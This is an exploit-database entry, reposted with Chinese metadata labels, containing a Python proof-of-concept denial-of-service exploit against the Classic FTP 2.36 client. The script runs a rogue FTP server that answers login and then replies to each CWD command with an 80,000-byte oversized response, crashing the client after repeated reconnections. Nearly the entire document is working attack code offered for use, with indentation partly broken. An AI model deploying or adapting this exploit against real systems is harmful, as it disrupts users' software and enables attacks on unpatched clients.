Classic FTP 2.36 – CWD Reconnection Denial of Service

  • 作者: St0rn
    日期: 2015-07-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/37711/
  • #!/usr/bin/env python
    #
    # Exploit Title: Classic FTP v2.36 CWD Reconnection DOS
    # Date: 27/07/2015
    # Exploit Author: St0rn <fabien[at]anbu-pentest[dot]com>
    # Vendor Homepage: www.nchsoftware.com
    # Software Link: www.nchsoftware.com/classic/cftpsetup.exe
    # Version: 2.36
    # Tested on: Windows 7
    #
    
    
    import socket
    import sys
    import time
    
    
    junk1="250 "+"a"*(80000-6)+"\r\n"
    c=1
    
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("",21))
    s.listen(10)
    
    
    while 1:
     conn, addr = s.accept()
     print 'Connected with ' + addr[0] + ':' + str(addr[1])
     conn.send("220 Classic FTP Xsploit\r\n")
     try:
    while 1:
     buf=conn.recv(1024)
     if "USER" in buf:
    conn.send("331 User name okay, need password\r\n")
     if "PASS" in buf:
    conn.send("230-Password accepted.\r\n")
    conn.send("230 User logged in.\r\n")
     if "CWD" in buf:
    conn.send(junk1)
    print "Evil Response send with %s bytes!" %len(junk1)
    print "Loop %s: \n\tWaiting client reconnection, crash in %s loop\n" %(c,(122-c))
    if c==122:
     print "BOOMmMm!"
    c+=1
     if "QUIT" in buf:
    break
     except:
    time.sleep(0)